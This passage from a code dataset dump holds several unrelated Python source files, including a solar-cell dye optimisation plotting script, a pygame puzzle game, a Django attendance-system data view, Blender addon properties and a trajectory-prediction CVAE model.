Print correlation_answer to verify.')\r\n \r\nelse:\r\n a = int(correlation_answer[0])\r\n print('\\n\\nThe volume fractions of correlation best fit are:')\r\n print(f'A={V1[a]:.1f}, B={V2[a]:.1f}, K={V3[a]:.1f}, M={V4[a]:.1f}, C={V5[a]:.1f}, P={V6[a]:.1f}\\n')\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 272 as follows:\r\n # print(f'A={V1[a]:.1f}, B={V2[a]:.1f}, K={V3[a]:.1f}, M={V4[a]:.1f}, C={V5[a]:.1f}, P={V6[a]:.1f}, NEWDYE={V7[a]:.1f}\\n')\r\n\r\n# Define function to plot correlation coefficient vs. the index of the volume fraction meshgrid if allow = True\r\n# Note: The red dot indicates the max value in the correlation vector. The combination assosciated with this\r\n # Max value index is printed as the figure subtitle\r\ndef plotcorrelationcoefficient(allow = True):\r\n \r\n if allow:\r\n \r\n plt.figure(1)\r\n plt.plot(correlation)\r\n plt.scatter(a, max(correlation), color = 'r')\r\n plt.xlabel('Volume Fraction Index')\r\n plt.ylabel('Pearson Correlation Coefficient (Unitless)')\r\n plt.suptitle('Correlation Coefficient vs. VF Index')\r\n plt.title(f'A={V1[a]:.1f}, B={V2[a]:.1f}, K={V3[a]:.1f}, M={V4[a]:.1f}, C={V5[a]:.1f}, P={V6[a]:.1f}',\r\n fontsize = 10)\r\n #plt.savefig('Correlation_Plot', dpi = 500)\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 290 as follows:\r\n # plt.title(f'A={V1[a]:.1f}, B={V2[a]:.1f}, K={V3[a]:.1f}, M={V4[a]:.1f}, C={V5[a]:.1f}, P={V6[a]:.1f, NEWDYE={V7[a]:.1f}', fontsize = 10)\r\n\r\n if not allow: pass\r\n\r\n# Option to plot correlation coefficient vs. volume fraction index\r\nplotcorrelationcoefficient(allow = True)\r\n\r\n# Define function to plot the LHE of the combination optimized by correlation fitment vs. the solar irradiance spectrum\r\ndef plotcorrelationcombination(allow = True):\r\n \r\n if allow:\r\n \r\n fig2, ax2 = plt.subplots()\r\n ax21 = ax2.twinx()\r\n ax2.plot(wavelength, np.clip(F(V1[a], V2[a], V3[a], V4[a], V5[a], V6[a]), 0, None),\r\n label = 'LHE Spectrum', color = 'orange')\r\n ax21.plot(wavelength, spectrum_regression(wavelength), label = 'Solar Irradiance')\r\n ax2.set_xlabel('Wavelength (nm)')\r\n ax2.set_ylabel('Light Harvesting Efficency (Unitless)')\r\n ax21.set_ylabel('Solar Irradiance (W*m$^{-2}$*nm$^{-1}$)')\r\n plt.suptitle('Correlation Fitment')\r\n plt.title(f'A={V1[a]:.1f}, B={V2[a]:.1f}, K={V3[a]:.1f}, M={V4[a]:.1f}, C={V5[a]:.1f}, P={V6[a]:.1f}',\r\n fontsize = 10)\r\n fig2.legend(bbox_to_anchor = (0.9, 0.75), loc = 'lower right', prop = {\"size\" : 8})\r\n plt.show()\r\n #fig.savefig(Correlation_Fitment, dpi = 500)\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust lines 309 and 316 as follows:\r\n # ax2.plot(wavelength, np.clip(F(V1[a], V2[a], V3[a], V4[a], V5[a], V6[a], V7[a]), 0, None), label = 'LHE Spectrum', color = 'orange')\r\n # plt.title(f'A={V1[a]:.1f}, B={V2[a]:.1f}, K={V3[a]:.1f}, M={V4[a]:.1f}, C={V5[a]:.1f}, P={V6[a]:.1f, NEWDYE={V7[a]:.1f}', fontsize = 10)\r\n \r\n if not allow: pass\r\n\r\n# Option to plot LHE of combination that maximizes the correlation fitment\r\nplotcorrelationcombination(allow = True)\r\n \r\n\r\n\r\n\r\n################### Find best integral fit ###################\r\n\r\n# Store the maximum values of 'integral' in a new array\r\nintegral_answer = list(np.where(integral == max(integral)))\r\n\r\n# Check if there are muliple maximum values in 'integral'\r\nif len(integral_answer) > 1:\r\n print('There are multiple integral best fits. 
Print integral_answer to verify.')\r\n \r\nelse:\r\n b = int(integral_answer[0])\r\n print('The volume fractions of integral best fit are:')\r\n print(f'A={V1[b]:.1f}, B={V2[b]:.1f}, K={V3[b]:.1f}, M={V4[b]:.1f}, C={V5[b]:.1f}, P={V6[b]:.1f}\\n')\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 346 as follows:\r\n # print(f'A={V1[b]:.1f}, B={V2[b]:.1f}, K={V3[b]:.1f}, M={V4[b]:.1f}, C={V5[b]:.1f}, P={V6[b]:.1f}, NEWDYE={V7[b]:.1f}\\n')\r\n \r\n# Define function to plot the absorbance integral vs. the index of the volume fraction meshgrid if allow = True\r\n# Note: The red dot indicates the max value in the integral vector. The combination assosciated with this\r\n # Max value index is printed as the figure subtitle\r\ndef plotintegralfit(allow = True):\r\n \r\n if allow:\r\n \r\n plt.figure(3) \r\n plt.plot(integral)\r\n plt.scatter(b, max(integral), color = 'r')\r\n plt.xlabel('Volume Fraction Index')\r\n plt.ylabel('Spectrum Integral (nm)')\r\n plt.suptitle('Integral Value vs. VF Index')\r\n plt.title(f'A={V1[b]:.1f}, B={V2[b]:.1f}, K={V3[b]:.1f}, M={V4[b]:.1f}, C={V5[b]:.1f}, P={V6[b]:.1f}',\r\n fontsize = 10)\r\n #plt.savefig('Integral_Plot', dpi = 500)\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 364 as follows:\r\n # plt.title(f'A={V1[b]:.1f}, B={V2[b]:.1f}, K={V3[b]:.1f}, M={V4[b]:.1f}, C={V5[b]:.1f}, P={V6[b]:.1f, NEWDYE={V7[b]:.1f}', fontsize = 10)\r\n\r\n if not allow: pass\r\n \r\n# Option to plot absorbance integral vs. volume fraction index\r\nplotintegralfit(allow = True) \r\n \r\n# Define function to plot the LHE of the combination optimized by integral fitment vs. the solar irradiance spectrum\r\ndef plotintegralcombination(allow = True):\r\n \r\n if allow:\r\n \r\n fig4, ax4 = plt.subplots()\r\n ax41 = ax4.twinx()\r\n ax4.plot(wavelength, np.clip(F(V1[b], V2[b], V3[b], V4[b], V5[b], V6[b]), 0, None),\r\n label = 'LHE Spectrum', color = 'orange')\r\n ax41.plot(wavelength, spectrum_regression(wavelength), label = 'Solar Irradiance')\r\n ax4.set_xlabel('Wavelength (nm)')\r\n ax4.set_ylabel('Light Harvesting Efficency (Unitless)')\r\n ax41.set_ylabel('Solar Irradiance (W*m$^{-2}$*nm$^{-1}$)')\r\n plt.suptitle('Integral Fitment')\r\n plt.title(f'A={V1[b]:.1f}, B={V2[b]:.1f}, K={V3[b]:.1f}, M={V4[b]:.1f}, C={V5[b]:.1f}, P={V6[b]:.1f}',\r\n fontsize = 10)\r\n fig4.legend(bbox_to_anchor = (0.9, 0.75), loc = 'lower right', prop = {\"size\" : 8})\r\n plt.show()\r\n #fig.savefig(Integral_Fitment, dpi = 500)\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust lines 383 and 390 as follows:\r\n # ax2.plot(wavelength, np.clip(F(V1[b], V2[b], V3[b], V4[b], V5[b], V6[b], V7[b]), 0, None), label = 'LHE Spectrum', color = 'orange')\r\n # plt.title(f'A={V1[b]:.1f}, B={V2[b]:.1f}, K={V3[b]:.1f}, M={V4[b]:.1f}, C={V5[b]:.1f}, P={V6[b]:.1f, NEWDYE={V7[b]:.1f}', fontsize = 10)\r\n \r\n if not allow: pass\r\n\r\n# Option to plot LHE of combination that maximizes the integral fitment\r\nplotintegralcombination(allow = True)\r\n\r\n\r\n################### Find best covariance fit ###################\r\n\r\n# Store the maximum values of 'covariance' in a new array\r\ncovariance_answer = list(np.where(covariance == max(covariance)))\r\n\r\n# Check if there are muliple maximum values in 'covariance'\r\nif len(covariance_answer) > 1:\r\n print('There are multiple covariance best fits. 
Print covariance_answer to verify.')\r\n \r\nelse:\r\n c = int(covariance_answer[0])\r\n print('The volume fractions of covariance best fit are:')\r\n print(f'A={V1[c]:.1f}, B={V2[c]:.1f}, K={V3[c]:.1f}, M={V4[c]:.1f}, C={V5[c]:.1f}, P={V6[c]:.1f}\\n')\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 418 as follows:\r\n # print(f'A={V1[c]:.1f}, B={V2[c]:.1f}, K={V3[c]:.1f}, M={V4[c]:.1f}, C={V5[c]:.1f}, P={V6[c]:.1f}, NEWDYE={V7[c]:.1f}\\n')\r\n\r\n# Define function to plot absorbance covariance vs. the index of the volume fraction meshgrid if allow = True\r\n# Note: The red dot indicates the max value in the covariance vector. The combination assosciated with this\r\n # Max value index is printed as the figure subtitle\r\ndef plotcovariancefit(allow = True):\r\n \r\n if allow:\r\n \r\n plt.figure(5)\r\n plt.plot(covariance)\r\n plt.scatter(c, max(covariance), color = 'r')\r\n plt.xlabel('Volume Fraction Index')\r\n plt.ylabel('Covariance (nm)')\r\n plt.suptitle('Covariance vs. VF Index')\r\n plt.title(f'A={V1[c]:.1f}, B={V2[c]:.1f}, K={V3[c]:.1f}, M={V4[c]:.1f}, C={V5[c]:.1f}, P={V6[c]:.1f}',\r\n fontsize = 10)\r\n #plt.savefig('Covariance_Plot', dpi = 500)\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 436 as follows:\r\n # plt.title(f'A={V1[c]:.1f}, B={V2[c]:.1f}, K={V3[c]:.1f}, M={V4[c]:.1f}, C={V5[c]:.1f}, P={V6[c]:.1f, NEWDYE={V7[c]:.1f}', fontsize = 10)\r\n\r\n \r\n if not allow: pass\r\n \r\n# Option to plot covariance vs. volume fraction index\r\nplotcovariancefit(allow = True) \r\n\r\n# Define function to plot the LHE of the combination optimized by covariance fitment vs. the solar irradiance spectrum\r\ndef plotcovariancecombination(allow = True):\r\n \r\n if allow:\r\n \r\n fig6, ax6 = plt.subplots()\r\n ax61 = ax6.twinx()\r\n ax6.plot(wavelength, np.clip(F(V1[c], V2[c], V3[c], V4[c], V5[c], V6[c]), 0, None),\r\n label = 'LHE Spectrum', color = 'orange')\r\n ax61.plot(wavelength, spectrum_regression(wavelength), label = 'Solar Irradiance')\r\n ax6.set_xlabel('Wavelength (nm)')\r\n ax6.set_ylabel('Light Harvesting Efficency (Unitless)')\r\n ax61.set_ylabel('Solar Irradiance (W*m$^{-2}$*nm$^{-1}$)')\r\n plt.suptitle('Covariance Fitment')\r\n plt.title(f'A={V1[c]:.1f}, B={V2[c]:.1f}, K={V3[c]:.1f}, M={V4[c]:.1f}, C={V5[c]:.1f}, P={V6[c]:.1f}',\r\n fontsize = 10)\r\n fig6.legend(bbox_to_anchor = (0.9, 0.75), loc = 'lower right', prop = {\"size\" : 8})\r\n plt.show()\r\n #fig.savefig(ovariance_Fitment, dpi = 500)\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust lines 456 and 463 as follows:\r\n # ax2.plot(wavelength, np.clip(F(V1[c], V2[c], V3[c], V4[c], V5[c], V6[c], V7[c]), 0, None), label = 'LHE Spectrum', color = 'orange')\r\n # plt.title(f'A={V1[c]:.1f}, B={V2[c]:.1f}, K={V3[c]:.1f}, M={V4[c]:.1f}, C={V5[c]:.1f}, P={V6[c]:.1f, NEWDYE={V7[c]:.1f}', fontsize = 10)\r\n \r\n if not allow: pass\r\n\r\n# Option to plot LHE of combination that maximizes the integral fitment\r\nplotcovariancecombination(allow = True)","repo_name":"noahmanz/Optimizing-the-Combination-of-Natural-Pigments-for-Co-Sensitization-of-Panchromatic-TiO2-DSSCs","sub_path":"Optimization_Script.py","file_name":"Optimization_Script.py","file_ext":"py","file_size_in_byte":21200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"3212412998","text":"import itertools\nimport queue\nimport random\nfrom typing import Tuple, Dict\n\nimport pygame\nfrom pygame.sprite import Sprite\nfrom pygame import 
Rect\n\n\nSCREENRECT = Rect(0, 0, 900, 600)\n\nEVENT_CASCADE_TICK = pygame.USEREVENT + 1\npygame.time.set_timer(EVENT_CASCADE_TICK, 100)\n\n\nclass Surfaces:\n    def __init__(self):\n        self.surfaces = [\n            self._new(self._right, self._down),\n            self._new(self._down, self._left),\n            self._new(self._left, self._up),\n            self._new(self._up, self._right),\n        ]\n\n    def __getitem__(self, item):\n        return self.surfaces[item]\n\n    def _down(self, small, big):\n        return Rect(big - small, big - small, 2 * small, small + big)\n\n    def _right(self, small, big):\n        return Rect(big - small, big - small, small + big, 2 * small,)\n\n    def _left(self, small, big):\n        return Rect(0, big - small, small + big, 2 * small,)\n\n    def _up(self, small, big):\n        return Rect(big - small, 0, 2 * small, small + big,)\n\n    def _new(self, rect1, rect2):\n        return [\n            self._new_color(rect1, rect2, (0, 0, 255)),\n            self._new_color(rect1, rect2, (0, 255, 0)),\n            self._new_color(rect1, rect2, (255, 0, 0)),\n        ]\n\n    def _new_color(self, rect1, rect2, color):\n        surf = pygame.Surface((50, 50))\n        pygame.draw.circle(surf, color, (25, 25), 25)\n        small = 2\n        big = 25\n        pygame.draw.rect(surf, (255, 255, 255), rect1(small, big))\n        pygame.draw.rect(surf, (255, 255, 255), rect2(small, big))\n        return surf\n\n\nclass Ball(Sprite):\n    def __init__(\n        self,\n        surfaces: Surfaces,\n        rotation: int,\n        center,\n        balls_to_rotate: queue.Queue,\n        color: int,\n    ):\n        super().__init__()\n        self.center = center\n        self.rotation = rotation\n        self.center_pos = (50 + center[0] * 50, 50 + center[1] * 50)\n        self.surfaces = surfaces\n        self.neighbors: Dict[int, Ball] = {}\n        self.balls_to_rotate = balls_to_rotate\n        self.color = color\n\n    def rect(self):\n        surf = self.surfaces[self.rotation][self.color]\n        return surf.get_rect(center=self.center_pos)\n\n    def surf(self) -> Tuple[pygame.Surface, Rect]:\n        surf = self.surfaces[self.rotation][self.color]\n        return surf, surf.get_rect(center=self.center_pos)\n\n    def move_ip(self, x, y):\n        self.center_pos = (self.center_pos[0] + x, self.center_pos[1] + y)\n\n    def rotate(self, color=None):\n        i = (self.rotation + 1) % 4\n        self.rotation = i\n        neighbor = self.neighbors.get(i)\n        if neighbor is not None:\n            if self.match(neighbor):\n                self.balls_to_rotate.put((neighbor, self.color))\n\n        if color is not None:\n            self.color = color\n\n    def set_left(self, ball: \"Ball\"):\n        self.neighbors[3] = ball\n\n    def set_down(self, ball: \"Ball\"):\n        self.neighbors[0] = ball\n\n    def set_right(self, ball: \"Ball\"):\n        self.neighbors[1] = ball\n\n    def set_up(self, ball: \"Ball\"):\n        self.neighbors[2] = ball\n\n    def match(self, other: \"Ball\"):\n        if other.rotation == self.rotation:\n            return False\n        if other.rotation == (self.rotation + 1) % 4:\n            return False\n        return True\n\n\nclass App:\n    def __init__(self):\n        winstyle = 0\n        bestdepth = pygame.display.mode_ok(SCREENRECT.size, winstyle, 32)\n        self.screen = pygame.display.set_mode(SCREENRECT.size, winstyle, bestdepth)\n        pygame.display.set_caption(\"Cascade\")\n        self.running = True\n\n        self.balls_to_rotate = queue.LifoQueue()\n\n        surfaces = Surfaces()\n        balls = {}\n\n        grid_size = 10\n        grid = list(itertools.product(range(grid_size), range(grid_size)))\n        for i, j in grid:\n            balls[i, j] = Ball(\n                surfaces=surfaces,\n                rotation=random.randint(0, 3),\n                center=(i, j),\n                balls_to_rotate=self.balls_to_rotate,\n                color=random.randint(0, 2),\n            )\n\n        grid_rect = Rect(0, 0, 0, 0)\n        for ball in balls.values():\n            grid_rect.union_ip(ball.rect())\n        shift = (\n            SCREENRECT.width / 2 - grid_rect.width / 2,\n            SCREENRECT.height / 2 - grid_rect.height / 2,\n        )\n\n        for ball in balls.values():  # type: Ball\n            ball.move_ip(*shift)\n\n        def ok(i, j):\n            return i >= 0 and j >= 0 and i < grid_size and j < grid_size\n\n        for i, j in grid:\n            if ok(i + 1, j):\n                balls[i, j].set_left(balls[i + 1, j])\n            if ok(i, j + 1):\n                balls[i, j].set_down(balls[i, j + 1])\n            if ok(i - 1, j):\n                balls[i, j].set_right(balls[i - 1, j])\n            if ok(i, j - 1):\n                balls[i, j].set_up(balls[i, j - 1])\n\n        self.balls = pygame.sprite.Group(*[b for b in balls.values()])\n\n    def run(self):\n\n        while self.running:\n            for event in pygame.event.get():\n                if event.type == pygame.QUIT:\n                    self.running = False\n                elif event.type == pygame.MOUSEBUTTONDOWN:\n                    for ball in self.balls:\n                        assert isinstance(ball, Ball)\n                        if ball.rect().collidepoint(event.pos):\n                            ball.rotate()\n                elif event.type == EVENT_CASCADE_TICK:\n                    if not self.balls_to_rotate.empty():\n                        ball, color = self.balls_to_rotate.get()\n                        ball.rotate(color=color)\n\n            for ball in self.balls:  # type: Ball\n                surf, rect = ball.surf()\n                self.screen.blit(surf, rect)\n\n            pygame.display.flip()\n\n        pygame.quit()\n\n\ndef main(winstyle=0):\n    pygame.init()\n    app = App()\n    app.run()\n    pygame.quit()\n","repo_name":"grihabor/cascade","sub_path":"src/cascade/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"14978104556","text":"import collections\n\n#make a dict of bigger string and then for every word in the second string remove the count in the dict, return the list of remaining words\ndef missingWords(s, t):\n    ls = s.split(' ')\n    lt = t.split(' ')\n    counter = collections.Counter(lt)\n    res = []\n    for s in ls:\n        if s in counter:\n            counter[s] -= 1\n            if counter[s] == 0:\n                del counter[s]\n        else:\n            res.append(s)\n    return \" \".join(res)","repo_name":"imjaya/Leetcode_solved","sub_path":"twosigma_missing_words.py","file_name":"twosigma_missing_words.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"1911036653","text":"#coding=utf-8\nfrom mysite.iclock.models import *\nfrom django.utils.encoding import smart_str\nfrom mysite.utils import *\n#from django.utils import simplejson\nfrom mysite.iclock.iutils import *\ndef getMiniData(request, ModelName):\n\t# dialog: fetch data\n\tminiData=request.GET.get(\"key\", \"\")\n\ttoResponse = \"'\"\n\tpk, pk_note, pk_note2, objs = (None, None, None, None)\n\tif miniData == \"UserID\":\n\t\tpk, pk_note, pk_note2 = (\"id\", \"PIN\", \"EName\")\n\t\tobjs = employee.objects.all()\n\t\tobjs=objs.order_by(\"PIN\").values(\"id\", \"PIN\", \"EName\")\n\tif miniData in [\"SN\",\"Device\"]:\n\t\tif not request.user.is_superuser:\n\t\t\tdepts=userDeptList(request.user)\n\t\t\tsns=IclockDept.objects.filter(dept__in=depts).values_list('SN')\n\t\t\tsnlist=[]\n\t\t\tfor sn in sns:\n\t\t\t\tsnlist.append(sn[0])\n\t\t\tobjs = iclock.objects.filter(SN__in=snlist).exclude(DelTag=1)\n\t\telse:\n\t\t\tobjs = iclock.objects.filter(Q(DelTag__isnull=True)|Q(DelTag=0))\n\t\tpk, pk_note = (\"SN\", \"Alias\")\n\t\tobjs=objs.order_by(\"Alias\").values(\"SN\", \"Alias\")\n\telif miniData in [\"DeptID\", \"depart\"]:\n\t\tpk, pk_note = (\"DeptNumber\", \"DeptName\")\n\t\tif (not request.user.is_superuser) and (not request.user.is_alldept ):\t\t\t\n\t\t\tdept_list=userDeptList(request.user)\n#\t\t\tdd=[]\n#\t\t\tfor i in dept_list:\n#\t\t\t\tdd.append(int(i.DeptID))\n\t\t\tobjs=department.objects.filter(DeptID__in=dept_list).values(\"DeptNumber\", \"DeptName\")\n\t\telse:\n\t\t\tobjs = department.objects.all().values(\"DeptNumber\", \"DeptName\")\n\telif miniData in [\"User\", \"Administrator\"]:\n\t\tpk, pk_note = (\"id\", \"username\")\n\t\tobjs = User.objects.all().values(\"id\", \"username\")\n\tres={}\n\tif len(objs)>0:\n\t\tfor row in objs:\n\t\t\tres[row[pk]]=(\"%s\"%row[pk_note])+(pk_note2 and\n                           (\" %s\"%row[pk_note2]) or \"\")\n#\t\tprint res\n\ttoResponse = dumps1(res)\n\treturn getJSResponse(toResponse)\n","repo_name":"sq2012/my-job","sub_path":"ecopro-10.0_ZKHNZZ-20170724-02/mysite/iclock/datamini.py","file_name":"datamini.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"35682846095","text":"import bpy\nfrom . import misc_functions\n\nfrom bpy.props import (StringProperty, BoolProperty, IntProperty, FloatProperty, FloatVectorProperty, EnumProperty, PointerProperty)\nfrom bpy.types import (Panel, Operator, AddonPreferences, PropertyGroup)\n\nclass NTZEDGCRV_ignitproperties(bpy.types.PropertyGroup):\n\n    bShowOptions : BoolProperty (\n        name=\"Show Options\",\n        description=\"Reveals options.\",\n        default = False,\n    )\n\n    customEdgeCurveSettings_List = [\n        (\"UNSET\", \"Unset (Use Last Known)\", \"\", \"\", 0),\n        (\"USE\", \"Custom\", \"\", \"\", 1),\n    ]\n\n    customEdgeCurveSettings : EnumProperty (\n        items = customEdgeCurveSettings_List,\n        name = \"Use Custom Edge Curve Settings\",\n        default = \"USE\"\n    )\n\n    useEdgeFlowCheckbox : BoolProperty(\n        name=\"Use Edge Flow\",\n        description=\"Applies edge flow to the newly created edge loops. (Default: True)\",\n        default = True\n    )\n\n    numSegmentsSlider : IntProperty(\n        name=\"Segment Num\",\n        description=\"Number of segments to add. (Default: 1)\",\n        default = 1,\n        min = 1,\n        soft_max = 16\n    )\n\n    numIterationsSlider : IntProperty(\n        name=\"Num Iterations\",\n        description=\"Number of iterations. (Default: 4)\",\n        default = 4,\n        min = 1,\n        soft_max = 128\n    )\n\n    tensionSlider : IntProperty(\n        name=\"Tension\",\n        description=\"Tension (Default: 180)\",\n        default = 180,\n        max = 500,\n        min = -500\n    )\n\n    minAngleSlider : IntProperty(\n        name=\"Minimum Angle\",\n        description=\"Minimum Angle (Default: 0)\",\n        default = 0,\n        max = 180,\n        min = 0\n    )","repo_name":"Neltulz/Neltulz_Edge_Curve_Plus","sub_path":"properties.py","file_name":"properties.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"60"}
+{"seq_id":"72883659390","text":"import warnings\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\nfrom model.model_utils import ModeKeys,rgetattr,rsetattr,CustomLR,exp_anneal,sigmoid_anneal,unpack_RNN_state,run_lstm_on_variable_length_seqs,mutual_inf_mc\nfrom model.dynamics import SingleIntegrator\nfrom model.discrete_latent import DiscreteLatent\nfrom model.gmm3d import GMM3D\n\nclass MultimodalGenerativeCVAE(nn.Module):\n    def __init__(self,\n                 hyperparams,\n                 device,\n                 log_writer=None):\n        super(MultimodalGenerativeCVAE,self).__init__()\n        self.hyperparams = hyperparams\n        self.log_writer = log_writer\n        self.device = device\n        self.curr_iter = 0\n\n        self.node_modules = nn.ModuleDict()\n\n        self.min_hl = self.hyperparams['minimum_history_length']\n        self.max_hl = self.hyperparams['maximum_history_length']\n        self.ph = self.hyperparams['prediction_horizon']\n        self.state = self.hyperparams['state']\n        self.pred_state = self.hyperparams['pred_state']\n        self.state_length = int(np.sum([len(entity_dims) for entity_dims in self.state.values()]))\n\n        self.pred_state_length = int(np.sum([len(entity_dims) for entity_dims in self.pred_state.values()]))\n        self.create_graphical_model()\n\n        dyn_limits = hyperparams['dynamic']['limits']\n        self.dynamic = SingleIntegrator(1./self.hyperparams['frequency'], dyn_limits, device, self.x_size)\n\n    def set_curr_iter(self, curr_iter):\n        self.curr_iter = curr_iter\n\n    def add_submodule(self, name, model):\n        self.node_modules[name] = model.to(self.device)\n\n    def clear_submodules(self):\n        self.node_modules.clear()\n\n    def create_node_models(self):\n        ############################\n        #   Node History Encoder   #\n        ############################\n        self.add_submodule('/node_history_encoder',\n                           model=nn.LSTM(input_size=self.state_length,\n                                         hidden_size=self.hyperparams['enc_rnn_dim_history'],\n                                         batch_first=True))\n\n        ###########################\n        #   Node Future Encoder   #\n        ###########################\n        # We'll create this here, but then later check if in training mode.\n        # Based on that, we'll factor this into the computation graph (or not).\n        self.add_submodule('/node_future_encoder',\n                           model=nn.LSTM(input_size=self.pred_state_length,\n                                         hidden_size=self.hyperparams['enc_rnn_dim_future'],\n                                         bidirectional=True,\n                                         batch_first=True))\n        # These are related to how you initialize states for the node future encoder.\n        self.add_submodule('/node_future_encoder/initial_h',\n                           model=nn.Linear(self.state_length,\n                                           self.hyperparams['enc_rnn_dim_future']))\n        self.add_submodule('/node_future_encoder/initial_c',\n                           model=nn.Linear(self.state_length,\n                                           self.hyperparams['enc_rnn_dim_future']))\n\n\n        ################################\n        #   Discrete Latent Variable   #\n        ################################\n        self.latent = DiscreteLatent(self.hyperparams, self.device)\n\n        ######################################################################\n        #   Various 
Fully-Connected Layers from Encoder to Latent Variable #\n ######################################################################\n # Node History Encoder\n x_size = self.hyperparams['enc_rnn_dim_history']\n\n z_size = self.hyperparams['N'] * self.hyperparams['K']\n\n if self.hyperparams['p_z_x_MLP_dims'] is not None:\n self.add_submodule('/p_z_x',\n model=nn.Linear(x_size, self.hyperparams['p_z_x_MLP_dims']))\n hx_size = self.hyperparams['p_z_x_MLP_dims']\n else:\n hx_size = x_size\n\n self.add_submodule('/hx_to_z',\n model=nn.Linear(hx_size, self.latent.z_dim))\n\n if self.hyperparams['q_z_xy_MLP_dims'] is not None:\n self.add_submodule('/q_z_xy',\n # Node Future Encoder\n model=nn.Linear(x_size + 4 * self.hyperparams['enc_rnn_dim_future'],\n self.hyperparams['q_z_xy_MLP_dims']))\n hxy_size = self.hyperparams['q_z_xy_MLP_dims']\n else:\n # Node Future Encoder\n hxy_size = x_size + 4 * self.hyperparams['enc_rnn_dim_future']\n\n self.add_submodule('/hxy_to_z',\n model=nn.Linear(hxy_size, self.latent.z_dim))\n\n ####################\n # Decoder LSTM #\n ####################\n decoder_input_dims = self.pred_state_length + z_size + x_size\n\n self.add_submodule('/decoder/state_action',\n model=nn.Sequential(\n nn.Linear(self.state_length, self.pred_state_length)))\n\n self.add_submodule( '/decoder/rnn_cell',\n model=nn.GRUCell(decoder_input_dims, self.hyperparams['dec_rnn_dim']))\n self.add_submodule('/decoder/initial_h',\n model=nn.Linear(z_size + x_size, self.hyperparams['dec_rnn_dim']))\n\n ###################\n # Decoder GMM #\n ###################\n self.add_submodule('/decoder/proj_to_GMM_log_pis',\n model=nn.Linear(self.hyperparams['dec_rnn_dim'],\n self.hyperparams['GMM_components']))\n self.add_submodule('/decoder/proj_to_GMM_mus',\n model=nn.Linear(self.hyperparams['dec_rnn_dim'],\n self.hyperparams['GMM_components'] * self.pred_state_length))\n self.add_submodule('/decoder/proj_to_GMM_log_sigmas',\n model=nn.Linear(self.hyperparams['dec_rnn_dim'],\n self.hyperparams['GMM_components'] * self.pred_state_length))\n self.add_submodule('/decoder/proj_to_GMM_corrs',\n model=nn.Linear(self.hyperparams['dec_rnn_dim'],\n self.hyperparams['GMM_components']*3))\n\n self.x_size = x_size\n self.z_size = z_size\n\n\n def create_new_scheduler(self, name, annealer, annealer_kws, creation_condition=True):\n value_scheduler = None\n rsetattr(self, name + '_scheduler', value_scheduler)\n if creation_condition:\n annealer_kws['device'] = self.device\n value_annealer = annealer(annealer_kws)\n rsetattr(self, name + '_annealer', value_annealer)\n\n # This is the value that we'll update on each call of\n # step_annealers().\n rsetattr(self, name, value_annealer(0).clone().detach())\n dummy_optimizer = optim.Optimizer([rgetattr(self, name)], {'lr': value_annealer(0).clone().detach()})\n rsetattr(self, name + '_optimizer', dummy_optimizer)\n\n value_scheduler = CustomLR(dummy_optimizer,\n value_annealer)\n rsetattr(self, name + '_scheduler', value_scheduler)\n\n self.schedulers.append(value_scheduler)\n self.annealed_vars.append(name)\n\n \n def create_graphical_model(self):\n \"\"\"\n Creates or queries all trainable components.\n\n :param edge_types: List containing strings for all possible edge types for the node type.\n :return: None\n \"\"\"\n self.clear_submodules()\n\n ############################\n # Everything but Edges #\n ############################\n self.create_node_models()\n\n for name, module in self.node_modules.items():\n module.to(self.device)\n\n def set_annealing_params(self):\n 
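# NOTE: each annealed value rides on a dummy optimizer (see create_new_scheduler\n # above); stepping its LR scheduler in step_annealers() is what actually\n # updates the annealed hyperparameter value.\n 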
self.schedulers = list()\n self.annealed_vars = list()\n\n self.create_new_scheduler(name='kl_weight',\n annealer=sigmoid_anneal,\n annealer_kws={\n 'start': self.hyperparams['kl_weight_start'],\n 'finish': self.hyperparams['kl_weight'],\n 'center_step': self.hyperparams['kl_crossover'],\n 'steps_lo_to_hi': self.hyperparams['kl_crossover'] / self.hyperparams[\n 'kl_sigmoid_divisor']\n })\n\n self.create_new_scheduler(name='latent.temp',\n annealer=exp_anneal,\n annealer_kws={\n 'start': self.hyperparams['tau_init'],\n 'finish': self.hyperparams['tau_final'],\n 'rate': self.hyperparams['tau_decay_rate']\n })\n\n self.create_new_scheduler(name='latent.z_logit_clip',\n annealer=sigmoid_anneal,\n annealer_kws={\n 'start': self.hyperparams['z_logit_clip_start'],\n 'finish': self.hyperparams['z_logit_clip_final'],\n 'center_step': self.hyperparams['z_logit_clip_crossover'],\n 'steps_lo_to_hi': self.hyperparams['z_logit_clip_crossover'] / self.hyperparams[\n 'z_logit_clip_divisor']\n },\n creation_condition=self.hyperparams['use_z_logit_clipping'])\n\n def step_annealers(self):\n # This should manage all of the step-wise changed\n # parameters automatically.\n for idx, annealed_var in enumerate(self.annealed_vars):\n if rgetattr(self, annealed_var + '_scheduler') is not None:\n # First we step the scheduler.\n with warnings.catch_warnings(): # We use a dummy optimizer: Warning because no .step() was called on it\n warnings.simplefilter(\"ignore\")\n rgetattr(self, annealed_var + '_scheduler').step()\n\n # Then we set the annealed vars' value.\n rsetattr(self, annealed_var, rgetattr(self, annealed_var + '_optimizer').param_groups[0]['lr'])\n\n self.summarize_annealers()\n\n def summarize_annealers(self):\n if self.log_writer is 